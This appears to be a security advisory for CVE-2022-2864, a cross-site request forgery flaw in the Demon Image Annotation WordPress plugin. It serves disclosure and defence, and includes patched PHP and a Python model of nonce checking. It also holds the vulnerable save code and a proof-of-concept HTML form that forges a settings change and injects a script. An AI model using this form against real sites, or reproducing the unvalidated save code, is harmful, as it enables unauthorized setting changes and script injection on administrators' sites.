CVE-2022-2864: Critical Vulnerability in Demon Image Annotation Plugin for WordPress

The Demon Image Annotation plugin for WordPress, responsible for adding image annotations on websites, has been found to be vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 4.7. This vulnerability, identified as CVE-2022-2864, allows unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request. The attacker would only need to trick a site administrator into performing an action, such as clicking on a link, to exploit this vulnerability.

Vulnerability Details

The root cause of the CSRF vulnerability lies in the missing nonce validation in the ~/includes/settings.php file of the Demon Image Annotation plugin. Nonces are used to provide protection against CSRF attacks by generating one-time-use tokens that must be submitted alongside requests to confirm that the request was made by the same authenticated user.

The issue resides in the following code snippet from the ~/includes/settings.php file:

<?php
// Save settings: the POSTed value is written straight to the options table
// with no nonce check, so a forged cross-site request is accepted as well
if (isset($_POST['save'])) {
    update_option('demon_image_annotation', $_POST['demon_image_annotation']);
}

As seen in the code above, there is no nonce validation to verify the authenticity of the request.

Exploiting the Vulnerability

An attacker can exploit this vulnerability by crafting a malicious request and sending it to the site administrator. Once the site administrator unknowingly clicks on the link containing the request, the attacker can modify the plugin's settings to inject malicious web scripts.

Here is an example of malicious HTML that can be used to forge such a request:

<html>
  <body>
    <form action="http://target-website/wp-admin/admin.php?page=demon_image_annotation" method="POST">
      <input type="hidden" name="save" value="1">
      <input type="hidden" name="demon_image_annotation[some_setting]" value="<script>alert('CVE-2022-2864')</script>">
      <input type="submit" value="Click me">
    </form>
  </body>
</html>

If a logged-in administrator submits this form, the plugin stores the attacker-supplied value, so a JavaScript payload such as alert('CVE-2022-2864') can end up executing on the targeted WordPress site.

Mitigation

1. Update the Demon Image Annotation plugin to the latest version, which addresses the CSRF vulnerability.

Here is a modified code snippet with nonce validation:

<?php
// Emit the nonce as a hidden field in the settings form; the token is
// bound to the current user and action and expires after a limited time
$nonce = wp_create_nonce('demon-image-annotation-settings');
echo '<input type="hidden" name="nonce" value="' . esc_attr($nonce) . '">';

// Save settings only when a nonce is present and verifies for this action
// (the capability check additionally keeps non-admins from writing options)
if (isset($_POST['save'], $_POST['nonce'])
    && wp_verify_nonce($_POST['nonce'], 'demon-image-annotation-settings')
    && current_user_can('manage_options')) {
    update_option('demon_image_annotation', $_POST['demon_image_annotation']);
}

2. Regularly update WordPress core, themes, and plugins to the latest versions to stay protected against known vulnerabilities.
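As an added example that is not part of this advisory, of the plugin, or of WordPress itself, the Python below models the scheme behind wp_create_nonce and wp_verify_nonce (a keyed hash over a time tick, the action, the user id and the session token, valid for the current and the previous tick) and runs the patched save logic against a forged request that carries no nonce and against a legitimate one. The salt, user id, session token and timestamps are constructed values, and SHA-256 stands in for the hash WordPress uses.

```python
import hashlib
import hmac
import math

# Constructed secret standing in for WordPress's NONCE_KEY/NONCE_SALT
NONCE_SALT = b"constructed-nonce-salt-not-a-real-secret"
NONCE_LIFE = 24 * 60 * 60  # WordPress default nonce life: one day
ACTION = "demon-image-annotation-settings"


def _tick(now: int) -> int:
    # WordPress advances the tick every half nonce-life, so a nonce stays
    # valid for between 12 and 24 hours rather than being single-use
    return math.ceil(now / (NONCE_LIFE / 2))


def _nonce_for_tick(tick: int, action: str, user_id: int, session: str) -> str:
    # Same input shape as wp_create_nonce: tick|action|uid|session token
    data = f"{tick}|{action}|{user_id}|{session}".encode()
    digest = hmac.new(NONCE_SALT, data, hashlib.sha256).hexdigest()
    return digest[-12:-2]  # 10-char token, like WordPress's substr(..., -12, 10)


def create_nonce(action: str, user_id: int, session: str, now: int) -> str:
    return _nonce_for_tick(_tick(now), action, user_id, session)


def verify_nonce(nonce: str, action: str, user_id: int, session: str, now: int) -> int:
    """Returns 1 (current tick), 2 (previous tick) or 0 (invalid), like wp_verify_nonce."""
    tick = _tick(now)
    if hmac.compare_digest(nonce, _nonce_for_tick(tick, action, user_id, session)):
        return 1
    if hmac.compare_digest(nonce, _nonce_for_tick(tick - 1, action, user_id, session)):
        return 2
    return 0


def save_settings(post: dict, user_id: int, session: str, now: int, options: dict) -> bool:
    """Patched handler: the option is written only when the nonce checks out."""
    if "save" not in post or "nonce" not in post:
        return False  # a forged cross-site form has no way to supply the token
    if not verify_nonce(post["nonce"], ACTION, user_id, session, now):
        return False
    options["demon_image_annotation"] = post.get("demon_image_annotation")
    return True
```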

Original References

1. Demon Image Annotation Plugin: https://wordpress.org/plugins/demon-image-annotation/
2. CVE-2022-2864 Vulnerability Details: https://nvd.nist.gov/vuln/detail/CVE-2022-2864

Conclusion

The CVE-2022-2864 vulnerability in the Demon Image Annotation plugin for WordPress poses significant risks to site administrators, as it allows attackers to inject malicious web scripts via a forged request. Updating the plugin, implementing nonce validation, and being cautious of suspicious links can help mitigate these risks.

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/31/2022 18:54:00 UTC